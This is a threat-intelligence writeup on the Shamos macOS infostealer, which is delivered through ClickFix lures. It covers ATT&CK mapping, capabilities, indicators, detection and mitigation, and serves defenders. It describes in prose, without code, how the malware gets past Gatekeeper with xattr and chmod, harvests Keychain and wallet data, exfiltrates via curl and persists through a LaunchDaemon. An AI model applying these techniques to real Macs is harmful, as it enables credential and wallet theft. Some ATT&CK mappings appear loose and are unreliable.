Full Report
A new infostealer malware targeting Mac devices, called 'Shamos,' is targeting Mac devices in ClickFix attacks that impersonate troubleshooting guides and fixes. [...]
Analysis Summary
# Tool/Technique: Shamos Infostealer (Variant of Atomic macOS Stealer - AMOS)
## Overview
Shamos is a newly identified infostealer malware specifically targeting macOS devices. It is delivered via social engineering tactics known as "ClickFix attacks," where users attempting to troubleshoot or fix apparent system errors are tricked into executing shell commands that download and run the malware. Shamos is designed to steal sensitive data, credentials, and cryptocurrency wallet information.
## Technical Details
- Type: Malware family (Infostealer, variant of AMOS)
- Platform: macOS
- Capabilities: Data theft (browser credentials, Keychain items, Apple Notes, crypto wallets), host reconnaissance, anti-VM checks, persistence mechanism establishment.
- First Seen: Detected since June 2025 (based on CrowdStrike monitoring period).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Implied via luring mechanism/delivered payload structure)
- T1059 - Command and Scripting Interpreter
- T1059.006 - Command and Scripting Interpreter: **macOS and OS X** (Used to execute malicious commands)
- T1189 - Drive-by Compromise (The use of malvertising/fake repositories functions similarly to lure execution)
- TA0003 - Persistence
- T1547.001 - Boot or Logon Autostart Execution: **LaunchDaemons** (Via Plist file creation)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Using `curl` to send collected data)
## Functionality
### Core Capabilities
- **Execution via ClickFix:** Lures victims through malvertising or fake GitHub repositories. Executes a Base64-encoded URL stored in a command, fetching a malicious Bash script.
- **Bypass Security Controls:** Uses `xattr` to remove the quarantine flag and `chmod` to make the binary executable, bypassing macOS Gatekeeper.
- **Data Collection:** Searches for and harvests data from web browsers, macOS Keychain items, Apple Notes, and cryptocurrency wallet files.
- **Exfiltration:** Packages collected data into an archive named `out.zip` and sends it to the attacker via `curl`.
### Advanced Features
- **Anti-Sandbox/Anti-VM:** Executes commands to detect if it is running within a virtualized or sandboxed environment.
- **Persistence:** If executed with `sudo` privileges, it installs a Plist file (`com.finder.helper.plist`) into the user's LaunchDaemons directory for automatic execution upon system startup.
- **Secondary Payload Delivery:** Capable of downloading additional payloads to the victim's home directory, including observed instances of a spoofed Ledger Live wallet app and a botnet module.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: `out.zip` (Exfiltrated archive), `com.finder.helper.plist` (Persistence file)
- Registry Keys: [Not applicable for primary storage on macOS, but persistence mechanism uses LaunchDaemons directory]
- Network Indicators: C2 communication utilizing `curl` to transmit exfiltration archive.
- Behavioral Indicators: Execution of shell commands derived from online troubleshooting guides (ClickFix), running `xattr` and `chmod` on downloaded binaries, checking for virtual environments, creating files in the `/Library/LaunchDaemons/` directory.
## Associated Threat Actors
- COOKIE SPIDER
## Detection Methods
- Signature-based detection: Signatures for the Shamos mach-O executable.
- Behavioral detection: Monitoring for unusual execution of commands like `xattr`, `chmod`, or scripts downloading unexpected payloads via Base64-decoded remote URLs. Detections for file creation/modification within the LaunchDaemons directory.
- YARA rules: [Not provided in the text]
## Mitigation Strategies
- **User Education:** Advise users never to execute commands copied from untrusted online sources or websites if they do not fully understand their function.
- **Source Verification:** Avoid sponsored search results for troubleshooting; prefer official Apple sources or moderated community forums (like Apple Community forums or built-in Help).
- **Privilege Control:** Limit the use of `sudo` to prevent malware from establishing persistence via LaunchDaemons.
- **Gatekeeper/Runtime Security:** Ensure macOS security features like Gatekeeper and XProtect are functioning correctly, though Shamos actively attempts to bypass them.
## Related Tools/Techniques
- Atomic macOS Stealer (AMOS) (Shamos is a variant of this malware family)
- ClickFix Attacks (The primary initial access technique)
- Other uses of ClickFix: Malware distribution via TikTok videos, fake Captcha forms, and fake Google Meet errors.